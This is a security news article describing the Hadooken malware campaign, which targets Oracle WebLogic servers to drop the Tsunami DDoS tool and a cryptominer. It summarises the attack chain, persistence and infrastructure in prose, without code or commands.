New Linux Hadooken Malware Campaign Targets Oracle Weblogic for Crypto-Mining

Published on September 16, 2024
Written by:
Lore Apostol
Lore Apostol
Infosec Writer & Editor

A new malware campaign targeting Oracle's WebLogic servers hinges on a Linux-based malware known as "Hadooken," according to a report from cloud security firm Aqua Nautilus. Upon execution, Hadooken drops the Tsunami malware and deploys a crypto miner.

This sophisticated exploit is primarily designed to infiltrate the enterprise-grade Java EE application server and deploy a cryptominer that leverages compromised systems for illicit cryptocurrency mining.

WebLogic Server is widely used across industries such as banking, e-commerce, and other business-critical systems and offers robust support for Java technologies, transaction management, and scalability. 

The security weaknesses in WebLogic, such as deserialization flaws and improper access controls, often invite exploitation. Additionally, misconfigurations like weak credentials or exposed admin consoles can result in severe vulnerabilities, including remote code execution (RCE), privilege escalation, and data breaches, if not adequately secured or patched.

Hadooken Malware Attack Flaw
Image Source: Aqua Nautilus

When deployed, the Hadooken malware executes a dual-stage attack. It first drops Tsunami malware, a known DDoS tool, onto the host system. Subsequently, it deploys a cryptominer, diverting valuable system resources for unauthorized cryptocurrency mining. 

The hackers use a Unix Shell script, a Python script for malicious execution, and a PowerShell script to distribute malware. Tsunami creates cron jobs to maintain persistence by executing malicious payloads periodically.

The IP addresses used for Hadooken are registered under the hosting company AEZA – one inactive IP in Russia and one active IP in Germany. The latter was linked to TeamTNT and Gang 8220 in the past.

Some reports say that one of the IP addresses employed by the threat actor to download Hadooken malware is used to disseminate this ransomware, so the threat actor may be targeting Windows endpoints to execute a ransomware attack, as well as Linux servers to target software often used by big organizations to launch backdoors and crypto-miners.



For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: